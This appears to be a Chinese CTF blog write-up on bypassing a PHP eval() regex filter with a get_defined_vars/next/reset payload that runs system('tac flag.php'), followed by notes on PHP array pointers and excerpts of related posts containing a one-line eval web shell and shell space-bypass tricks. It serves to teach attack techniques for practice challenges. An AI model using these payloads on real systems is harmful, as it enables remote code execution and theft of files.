多函数命令执行绕过
- 详细文本可看:
@Traveler2000的博客:多层函数绕过过滤
对于get_defined_vars函数注解
我们的payloads如下,对于此题:
1
2
3
4
5
6
7
8
9
10
11
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}payload:
?c=eval(next(reset(get_defined_vars())));&pay=system("tac flag.php");
为什么不可以直接使用:?c=eval(next(get_defined_vars()));&pay=system("tac flag.php");,这里我们需要明确:get_defined_vars()初始返回的确实为首位元素,但是这个首位元素是$_GET超全局变量数组,相当于返回了GET请求的数组,里面包含所有$_GET请求,所以我们需要一个reset/pos函数指向数组get_defined_vars()的第一个元素,即$_GET数组,然后再使用next函数,在$_GET数组中把元素进行移动。next把指针向后移一位,即我新传入的键值为pay的$_GET超全局变量的值。(不然就是题目中键值为c的超全局变量的值)。
关于php指针的注解
常用php指针指令:
函数 是否移动指针 返回值 current()/pos()否 当前指针位置的值(越界返回 false)next()是(后移) 新位置的值(越界返回 false)prev()是(前移) 新位置的值(越界返回 false)reset()是(重置) 数组第一个元素(空数组返回 false)end()是(跳末) 数组最后一个元素(空数组返回 false)key()否 当前指针位置的键名(越界返回 null)针对这道题,我们说说
pos、reset、next之间使用的区别。
首先明确:
所有类型数组初始指针都初始指向数组的第一个元素。首先对于
pos:
它直接返回当前状态下指针所指元素的值,由于数组默认的指针都是指向第一个元素,所以给人了一个它就是返回首个元素的值的错觉,其实是返回当前指针所指元素罢了。其次对于
next:
它将指针后移一位后,返回后移一位后指针所指的数的值最后关于
reset:
它将指针强制指向首位元素后返回首位元素的值,用于get_defined_vars这个函数中,因为不确定该数组指针所指的位置。
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Dedsec的博客!
相关推荐
2025-04-28
Linux重定向符绕过
基本概念 关于重新定向符详细解释可参考该篇文章:Linux重定向 简单来说,重新定向符的作用为: 分为覆盖写入以及追加写入两种写入方式,分别用两种符号表示:<,<< 尖的头头代表输出/输入的对象,判断输出输入流,另一侧,符号的”嘴部”后的数据,我们可以判断该数据/指令是用于输出指令还是用于对一个对象进行输入的准备材料。通过这样的判断,我们可以来区分该重定向是输入还是输出。 具体实例可以看我放的博客传送门。 关于错误重定向:典型代码有: 122>&12>>&1 从上到下分别是覆写和追加标准错误输出到标准输出,这里都是在对输出流进行操作。 关于为什么有时不写分号: 1ls -a >/dev/null 2>&1 我们需要明确,在这行代码中,2>&1也是命令的一部分,和前面的ls -a属于一部分,所以中间不需要分号分割。 通俗介绍重定向符 通俗解释在 Linux 等系统中,每个进程默认会有三个数据流:标准输入(stdin,文件描述符为...
2025-01-13
命令执行:使用文件包含绕过
ctfshow web32读题和简单分析:123456789101112131415161718192021<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-09-04 00:12:34# @Last Modified by: h1xa# @Last Modified time: 2020-09-04 00:56:31# @email: h1xa@ctfer.com# @link: https://ctfer.com*/error_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){ eval($c); } }else{ ...
2025-04-27
命令执行:或运算符脚本绕过
基本概念 基本思路:首先关注该题过滤的符号: 12345678910<?phpif(isset($_POST['c'])){ $c = $_POST['c'];if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){ eval("echo($c);"); }}else{ highlight_file(__FILE__);}?> 可见该题未过滤或符号|和空格。所以我们可以使用或运算符|,利用url编码的字符通过或运算符计算获取目标字符,进而实现绕过正则匹配。 关于eval执行的机制:如下代码也可以被eval执行: 12$a =...
2025-01-13
命令执行绕过符号总结
命令执行绕过符号总结在命令执行这种题目中我们总会遇到正则过滤,不得不使用一些特殊符号来绕过,下面是常见的符号和对应的绕过方法: 空格:%20%09Linux知识拓展: $IFS(Internal Field Separator),在shell环境里面,这个东西叫做内部字段分隔f符,它可以被设置为很多默认的字符,比如空格,制表符,换行符等。 虽然它默认为空格,但是我们不可以在shell中直接用$IFS代表空格,我们需要用这些方法来设置: $IFS$1,我来解释一下:在 shell 脚本和命令行中,$1 通常表示传递给脚本或函数的第一个位置参数但是在内部字段分割符这个地方,它被用来调取内部字段分隔符的第一个字符,即空格,参数位置为$1的空格。所以我们在这里可以用$IFS$1来绕过空格。 换行符:%0a php分隔符号”“1.使用js代码来编辑php代码: 123<script language="php">@eval($_POST['cmd']);</script>
2025-04-15
超全局变量自动传参
自动创建$_GET参数 $_GET 数组自动填充:只要 URL 里有参数,比如我传入的payload:/?c=include$_GET[1]&1=php://......,此时$_GET 数组就会自动生成对应元素。比如这里 &1=php://...... ,1 是参数名,php://...... 是参数值 ,$_GET[1] 就会被自动定义为 php://...... 。这就像给 PHP 一个信号,让它把 URL 里的参数存到 $_GET 这个 “小仓库” 里,方便后续代码取用 。
